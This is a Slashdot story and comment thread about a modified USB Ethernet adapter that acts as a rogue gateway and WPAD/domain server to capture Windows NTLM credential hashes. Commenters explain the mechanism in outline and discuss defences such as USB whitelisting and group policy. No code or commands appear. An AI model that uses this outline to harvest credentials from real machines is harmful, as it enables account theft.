Modified USB Ethernet Adapter Can Steal Windows and Mac Credentials (softpedia.com) 82
An anonymous reader writes from a report via Softpedia: An attacker can use a modified USB Ethernet adapter to fool Windows and Mac computers into giving away their login credentials. The attack relies on using a modified USB Ethernet adapter that runs special software, which tricks the attacked computer into accepting the Ethernet adapter as the network gateway, DNS, and WPAD server. The attack is possible because most computers will automatically install any plug-and-play (PnP) USB device. Even worse, when installing the new (rogue) USB Ethernet adapter, the computer will give out the local credentials needed to install the device. The custom software installed on the USB intercepts these credentials and logs them to an SQLite database. This attack can take around 13 seconds to carry out, and the USB Ethernet adapter can be equipped with an LED that tells the attacker when the login credentials have been stolen.
USB whitelisting (Score:5, Insightful)
This is why ALL of my USB devices are white listed on my computers.
There is no reason to allow rogue/unidentified hardware to be connected to a computer.
Re: USB whitelisting (Score:1)
Care to explain how?
Re: (Score:2, Informative)
Through udev rules on Linux and group policy under Windows.
Re: (Score:1)
Windows wise it'd be something like
Re: USB whitelisting (Score:4, Funny)
White listed... Here you go with your white superiority again. Always trying to keep the black man down
Re: (Score:1)
They're not. They have their own, it's called a blacklist.
Re: (Score:1)
not to nitpick...but "reverse racism" is just racism.
Nice! (Score:1)
How to protect? (Score:2)
Re: How to protect? (Score:1)
Set your computer on fire.
Re: (Score:1)
Re: (Score:1)
Re: (Score:3)
acetone also dissolves ABS, polycarbonate, polystyrene and other similar types of plastic. Better hope the USB port isn't made of those.
It's not too good for polyethylene either.
Re: (Score:2)
In windows, set the group policy so that USB devices are not automatically installed. Of course, you could also simply disable your USB hubs, but that may reduce the functionality of your PC beyond what you'd consider acceptable.
Re: (Score:3)
How can I protect my computer against that?
The best way is to not allow people to plug usb devices into your computer. Physical access trumps all.
Re: (Score:1)
Few links from a quick Google search
How to use Windows 7 to lock down removable media and keep your computer safe [microsoft.com]
Allow only known usb devices - Gentoo Wiki [gentoo.org]
See also Plug and Prey: Malicious USB Devices [irongeek.com]
Start using SSL (Score:2)
Another alternative is to use proper cryptography between your machine and the necessary server.
I'm not that used to Windows and Active Domain, so I can't comment much.
The Unix equivalent would be to setup LDAPS for the credential validation instead of plain LDAP, with properly signed certificate.
The rogue credential server running inside the USB would fail the certificate validation and the worsktation will refuse to use it.
Re: (Score:1)
I think Windows and *n*x are both sufficiently protected against simple network sniffing to make that a non-issue.
So I think this adapter does more than just snooping on what comes by - it must change the behavior of the OS in some way.
Re: (Score:2)
I think Windows and *n*x are both sufficiently protected against simple network sniffing to make that a non-issue. So I think this adapter does more than just snooping on what comes by - it must change the behavior of the OS in some way.
This made my day. Thanks for the laugh.
Not sniffing (Score:2)
I think Windows and *n*x are both sufficiently protected against simple network sniffing to make that a non-issue.
Unix: depends on configuration.
(goes from straight "everybody trust everyone else" like NIS and NFS servers, all the way up to Kerberos - everything is authentified over an encrypted link)
(and the home variant: use SSH + keys for everything)
Windows:
I've read some very appalling description of how it works.
No or not enough encryption.
So I think this adapter does more than just snooping on what comes by - it must change the behavior of the OS in some way.
Accroding to the summary, the key redirects to different (attacker-controlled) name server and Active Domain server (either running inside the USB adapter, or running elsewhere
Re: (Score:2)
Another alternative is to use proper cryptography between your machine and the necessary server.
The alternative is using authentication algorithms that don't suck. If Microsoft used a PAKE none of this would be possible. It's almost as if they are trying to get everyone hacked.
The Unix equivalent would be to setup LDAPS for the credential validation instead of plain LDAP, with properly signed certificate. The rogue credential server running inside the USB would fail the certificate validation and the worsktation will refuse to use it.
LDAP is used for backend authentication of incoming authentication and authorization requests. A client connecting to another UNIX server is not connecting to LDAP it is connecting to that server using whatever authentication mechanism is offered by the protocol associated with the connection.
Regardless sending credentials in
Squints suspiciously... (Score:3)
Re: Squints suspiciously... (Score:5, Informative)
Bad article is bad. It initiates a man-in-the-middle attack for network requests.
On Windows, this gets NTLM for a pass-the-hash attack if a network share is mounted or set to automatically connect.
Rubby Ducky (Score:2)
This is essentially the Rubber Ducky dongle that's been used in Mr Robot. Esmail and his tech consultants doesn't invent stuff like that, so this must have been available for a while.
Re:Rubby Ducky (Score:4, Informative)
This is one reason why Qubes [qubes-os.com] keeps USB controllers cordoned off in a separate unprivileged VM.
Users have no idea about the many drivers and services that any ol' USB device can run on a system, not to mention the varying quality and vulnerabilities therein.
Re: (Score:2)
Sorry about the bad link. The correct one is https://www.qubes-os.org/ [qubes-os.org]
Re: (Score:2)
Not a Rubber Ducky, but a LAN Turtle built by the same people. While a Rubber Ducky is a microcontroller in a USB case that poses as a HID, the LAN Turtle is a SoC running openwrt crammed into a USB-Ethernet case.
Re:Rubby Ducky (Score:4, Informative)
Hak5.org (blocked from work, so no direct link) sells the Rubber Ducky and the Turtle (the actual device used in the attack). Rob (aka Mubix -- the guy documenting the hack) does a fair bit with Darren Kitchen, the main guy behind Hak5.
Also, Darren and Shannon (the co-hosts of Hak5) consulted on Mr. Robot.
https://www.youtube.com/watch?... [youtube.com]
Umm yea. (Score:3)
You can plug in a hardware device into a computer and it may communicate with it. Just as long it tells the computer the correct response timely you can process the data sent to it in any way possible.
What may be just as easy is a pass threw sub connector where you plug your keyboard into one end. It will send keyboard data to the PC just fine. But log it and connect to a wireless network and send the data to different spots.
You can run all the system checks and not realizing they keyboard extension cable is the actual hack.
Re: (Score:2)
When you plug in a USB device, you should get a pop-up asking if you want to access it in
Re: (Score:2)
Does that get you passwords, or anything, with encrypted home/user directory and a strong password?
Re: (Score:2)
Re: (Score:3)
I don't believe this runs arbitrary code on the computer, the only code that runs is the built-in usb-ethernet drivers.
The OS installs the adapter and sends DHCP requests through it. It responds with extra config options in the DHCP response telling it the URL to the web proxy configuration file. The OS then sends an authentication request to the configured web proxy. This is the credentials that get stolen. Windows will send out an NTLMv2 hashed password you then need to crack.
Re: (Score:3, Interesting)
or the device just sends an error response and then Windows sends out an NTLMv1 hash - and you don't NEED to crack it.
Re: (Score:2)
I really don't see why windows can't ask before installing ANYTHING from usb. Clicking "OK' is not that big a deal relative to the effort of plugging in a usb device.
Re: (Score:2)
Re: (Score:2)
Because realistically most people are pretty dumb when it comes to using a computer. Autorun is a thing because otherwise more than half of computer users would never be able to launch a program.
That's why we have consistent UI's getting thrown out of the window and now most app developers are basically going with the approach of "throw everything randomly up in their face and hopefully they'll see a button that does what they want". Makes it easier for the average idiot to stumble upon what they want - m
Be afraid (Score:2)
Re: (Score:3)
Re: Bullshit - Neither OS X or Windows work that w (Score:1)
says the person who has one of these things that does work
Re: (Score:3)
Windows doesn't provide the USB dongle with a password at any point, as implied by the article. It 'auto-installs' signed drivers already on the PC or if configured, downloads them from the internet ... SIGNED DRIVERS ... SIGNED BY MICROSOFT. Not just any random driver on the USB device.
Windows does not do 'auto-run'
OS X doesn't do anything implied in this article either. If it doesn't have a driver for your USB device already, it just doesn't work, with the exception of printers there isn't a magic way that it reads drivers from the USB device or random internet sites.
This story is simply bullshit.
Yea TFA is worthless and does not disclose anything of relevance. This isn't about USB or device drivers. It is about getting windows to automatically do stupid crap over a network like trying to login to something. The IE Advanced option for example "Enabled Integrated Windows Authentication" is I believe enabled by default in at least Windows 7.
If you can get a browser or some internal service to attempt login by initial DHCP/WPAD/whatever you can make short work of the authentication attempt to derive
Re: (Score:2)
how is this any different than say, a modified router? Or a computer acting as a gateway? Is this device just intercepting unencrypted network traffic? Like any point on the internet can?
That would be no more earth-shattering than hearing that someone found a way to read my postal mail.
If you want privacy, you should be using end-to-end network encryption of some sort. Be it VPN, pgp email, ssh, etc. If you're sending in the clear and trusting every member of a huge network of random actors between you
Re: (Score:2)
If you're sending in the clear and trusting every member of a huge network of random actors between you and your destination, you're stupid.
This is exactly what Microsoft is enabling today in 2016 with "integrated authentication".... Apparently a sufficient number of people have not taken the opportunity to tell them how stupid they are.
There are some small caveats but none of them matter. The passwords aren't set in the clear but might as well be given the ease of deriving them from challenge material.
Re: (Score:2)
Windows will actually happily and by default send the credentials in clear text over wireless if you're using 802.1x without a Windows approved RADIUS server. The article and the summary is dumb because no USB device gets credentials by plugging it in. This is probably a network attack and could be done anywhere on a network.
Re: (Score:1)
This is simply bullshit.
Yeah, exactly like you 'working at a carrier'.
Re:Bullshit - Neither OS X or Windows work that wa (Score:5, Informative)
The USB device pretends to be an Ethernet adapter. Once the adapter is installed, the PC attempts to communicate with the network. The other portion of the box is running code that will automatically respond as if it's a domain controller so that Windows will attempt to authenticate using the existing credentials. This request includes the password hash. The software responds "thanks for the hash!". Unplug everything and go home to break the hash on your own time.
The OS isn't running any software from the device, the device is just taking advantage of the default behavior (authenticate to the new network).
Re: (Score:1)
It's bitztream, the autism-hating Slashdot troll!
doesn't have to be an adapter (Score:2)
This kind of attack could run on any USB device with a modified firmware (e.g. memory stick). If you don't want to hack an existing USB device, then for a few bucks you can make your own. It also doesn't have to interfere the original functionality of the USB device, so if you aren't paying attention, the device could perform it's task undetected.
I wonder if it works without a logged session (Score:2)
Re: (Score:2)
How can I get one? (Score:2)
Seriously sick of trying to deal with customers who forgot their own damn passwords. This would be a godsend!
Now with convenient red LED! (Score:1)
Re: (Score:1)